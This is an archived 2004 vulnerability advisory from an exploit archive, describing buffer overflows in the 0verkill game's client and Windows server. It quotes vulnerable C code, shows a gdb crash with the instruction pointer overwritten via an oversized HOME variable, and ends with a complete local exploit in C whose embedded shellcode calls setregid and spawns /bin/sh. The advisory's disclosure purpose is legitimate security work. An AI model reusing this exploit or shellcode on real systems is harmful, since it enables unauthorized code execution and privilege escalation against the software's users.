what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

overkill.txt

overkill.txt
Posted Feb 2, 2004
Authored by Adam Zabrocki | Site pi3.int.pl

The game 0verkill is susceptible to multiple buffer overflows. Remote exploit for the client attached.

tags | exploit, remote, overflow
SHA-256 | 7d2eb5c5920c68dd27c52a9f04b753988fd9871025110681a75d6a2a2c80d2d5

overkill.txt

Change Mirror Download
0verkill - little simple vulnerability.

I. Entry.

Vulnerability is game 0verkill. There is some little bugs in
clinet / server.

II. Vulnerability details.

a) client:

Vulnerability function is load_cfg(), save_cfg() and maybe
send_message().
There is simple buffer overflow bugs:

"in file client.c"
void load_cfg(char *host,char *name,int *color)
{
...
...
unsigned char txt[256];

#ifndef WIN32
sprintf(txt,"%s/%s",getenv("HOME"),CFG_FILE); //
first overflow
#else
sprintf(txt,"./%s",CFG_FILE);
#endif
...
...
a=strlen(txt);
...
...
memcpy(host,txt,strlen(txt)+1); //
second overflow
...
...
a=strlen(txt);
...
...
memcpy(name,txt,strlen(txt)+1); //
third overflow
...
...
}

"in file client.c"
void save_cfg(char *host,char *name,int color)
{
...
...
unsigned char txt[256];

#ifndef WIN32
sprintf(txt,"%s/%s",getenv("HOME"),CFG_FILE); //
overflow
#else
sprintf(txt,"./%s",CFG_FILE);
#endif
...
...
}

"in file client.c"
void send_message(char *msg)
{
static unsigned char packet[MAX_MESSAGE_LENGTH+2];
int a;

a=strlen(msg)+1;
packet[0]=P_MESSAGE;
memcpy
(packet+1,msg,a); // maybe
it's possible overflow
send_packet(packet,a+1,(struct sockaddr *)
(&server),my_id,0);
}

First we look for function load_cfg(). If we compiled 0verkill
on other system that Windows
we can set HOME and we can do overflow array txt (it's first
overflow). Look:

root@darkstar:~root/all/gry/0verkill# HOME=`perl -
e 'print "A"x300'`
root@darkstar:~root/all/gry/0verkill# gdb ./0verkill
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License,
and you are
welcome to change it and/or distribute copies of it under
certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty"
for details.
This GDB was configured as "i386-slackware-linux"...
(gdb) r
Starting program: /root/root/all/gry/0verkill/./0verkill

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) i r eip
eip 0x41414141 0x41414141
(gdb)

OK. Now we look for second and third bug... function memcpy()
copy from array txt to host (in second
bug) and from txt to name (thirs bug) bytes. We have controle on
array txt by setting HOME. Memcpy copy
strlen(txt)+1 bytes. Host and name is argument for load_cfg()
function. This function is called by main()
and there is declarate host and name array:

"in file client.c"
int main(int argc,char **argv)
{
...
...
char host[MAX_HOST_LEN+1];
char name[MAX_NAME_LEN+1];
...
...
memset(host,0,MAX_HOST_LEN+1);
...
...
load_cfg(host,name,&color);
...
...
}

Now looked for file cfg.h:

"in file cfg.h"
...
...
#define MAX_NAME_LEN 24 /* maximal length of player's name */
#define MAX_HOST_LEN 64 /* maximal length of hostname */
...
...
" -=[ EOF ]=- "

... and now look for function save_cfg(). There is bug like that
first bug in function load_cfg().
Now look for function send_message(). There is bad using
function memcpy() (like that second and third
bug in load_cfg() function) and maybe it is possible to do
buffer overflow atack. This function read
argument *msg. Call to function send_message() is in function
play(). Looked:

"in file client.c"
void play(void)
{
...
...
char string[80];
...
...
if (chat)
{
...
...
case 1:
char 0;
send_message(string);
...
...
}
...
...
}

MAX_MESSAGE_LENGTH is defined i cfg.h file too look:

"in file cfg.h"
...
...
#define MAX_MESSAGE_LENGTH 70 /* maximal length of chat message
*/
...
...
" -=[ EOF ]=- "

packet is array 72, string is array 80 and maybe there is
possible in this situation in function
send_message() do buffer overflow atack becouse string is
argument for send_message() function.

b) server, compiled on Windows platform

There is bug in function parse_command_line() and maybe in
function GetLastErrorText(). Looked for
function parse_command_line():

"in file server.c"
void parse_command_line(int argc,char **argv)
{
int a;
...
#ifdef WIN32
a=getopt(argc,argv,"hl:np:ri:Ic");
...
...
#endif
switch(a)
{
...
...
#ifdef WIN32
...
...
case 'i': { /* install service */
char username[80],
*pass=NULL;
...
...
if ( (pass=strchr
(optarg, '/'))==NULL ) {
strcpy(username,
optarg);
memcpy(username,
optarg, sizeof(username)-1);
...
...
}

We have simple bufer overflow by call strcpy(). I don't know why
autor 2 times copying argument
in to the array. First by call strcpy() and second time by call
memcpy()...
Function GetLastErrorText() have call sprintf that in theory
could do buffer overflow, but i couldn't
find how to fill argument for sprintf() who in theory could do
overflow. Look:

"in file server.c"
LPTSTR GetLastErrorText(LPTSTR lpszBuf, DWORD dwSize) {
...
LPTSTR lpszTemp=NULL;
...
...
dwRet=FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER |
FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_ARGUMENT_ARRAY, NULL,
globErr, LANG_NEUTRAL, (LPTSTR)&lpszTemp, 0,
NULL);
...
...
sprintf(lpszBuf, ": %u: %s", globErr,
lpszTemp); // there :P
...
...
}

IpszBuf is argument for function GetLastErrorText(), lpszTemp is
filled prbably by function FormatMessage();
but i couldn't find her.

III. Exploit.

Simple exploit for local bug in client 0verkill:

/*
* Simple local exploit for 0verkill by pi3 (pi3ki31ny)
* Greetz: [greetz on my web] && other my friends (you know who
you are)
*
* ...::: -=[ www.pi3.int.pl ]=- :::...
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <getopt.h>

#define PATH "./0verkill"
#define BUFS 300

/* ...::: -=[ www.pi3.int.pl ]=- :::... */

char shellcode[] = "\x31\xdb\x31\xc0\x31\xd2\xb2\x2d\x6a\x0a\x68
\x3a"
"\x2e\x2e\x2e\x68\x2d\x20\x3a\x3a\x68\x6c\x20
\x5d"
"\x3d\x68\x6e\x74\x2e\x70\x68\x69\x33\x2e\x69
\x68"
"\x77\x77\x2e\x70\x68\x3d\x5b\x20\x77\x68
\x3a\x3a"
"\x20\x2d\x68\x2e\x2e\x2e\x3a\x89\xe1\xb0\x04
\xcd"
"\x80"

/* setregid (20,20) */

"\x31\xc0\x31\xdb\x31\xc9\xb3\x14\xb1\x14\xb0
\x47"
"\xcd\x80"

/* exec /bin/sh */

"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62
\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0
\x0b\xcd"
"\x80"

/* exit(0) */

"\x31\xdb\x89\xd8\xb0\x01\xcd\x80";

long ret_ad(char *a1, char *a2) {

return (0xbffffffa-strlen(a1)-strlen(a2));
}

int ussage(char *arg) {

printf("\n\t...::: -=[ Simple exploit for 0verkill (by pi3) ]
=- :::...\n");
printf("\n\tUssage:\n\t[+] %s [options]\n
-? <this help screen>
-o <offset>
-p PATH\n\n",arg);
exit(-1);
}

int main(int argc, char *argv[]) {

long ret,*buf_addr;
char *buf,*path=PATH;
int i,opt,offset=0;
FILE *fp;

while((opt = getopt(argc,argv,"p:o:?")) != -1) {
switch(opt) {

case 'o':

offset=atoi(optarg);
break;

case 'p':

path=optarg;
break;

case '?':
default:

ussage(argv[0]);
break;
}
}

if ( (fp=fopen(path,"r"))==NULL) {
printf("\n*\tI can\'t open path to victim! - %
s\t*\n\n",path);
ussage(argv[0]);
} fclose(fp);

if (!(buf=(char*)malloc(BUFS))) {
printf("\nI can\'t locate memory! - buf\n");
exit(-1);
}

printf("\n\t...::: -=[ Simple exploit for 0verkill (by pi3) ]
=- :::...\n");
printf("\n\t[+] Bulding buffors!\n");

ret=ret_ad(shellcode,path);
ret+=offset;

printf("\t[+] Using adres 0x%x\n",ret);

buf_addr=(long*)buf;

for(i=0;i<BUFS;i+=4) {
*(buf_addr) = ret; buf_addr++;
}
memcpy(buf, shellcode, strlen(shellcode));

printf("\nExecuting the vuln program - %s\n\n",path);

setenv("HOME", buf, 1);
execl(path,path, 0);
return 0;
}

--
pi3 (pi3ki31ny) - pi3ki31ny@wp.pl
http://www.pi3.int.pl

"Wartosc czlowieka niejest wymierna do jego wiedzy lecz do
wartosci ktore ceni najbardziej"


----------------------------------------------------
Wygraj markowe telefony! Mamy a¿ 90 nagród do rozdania!
http://klik.wp.pl/?adr=http%3A%2F%2Fsms.wp.pl%2Falcatelkonkurs.html&sid=104

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close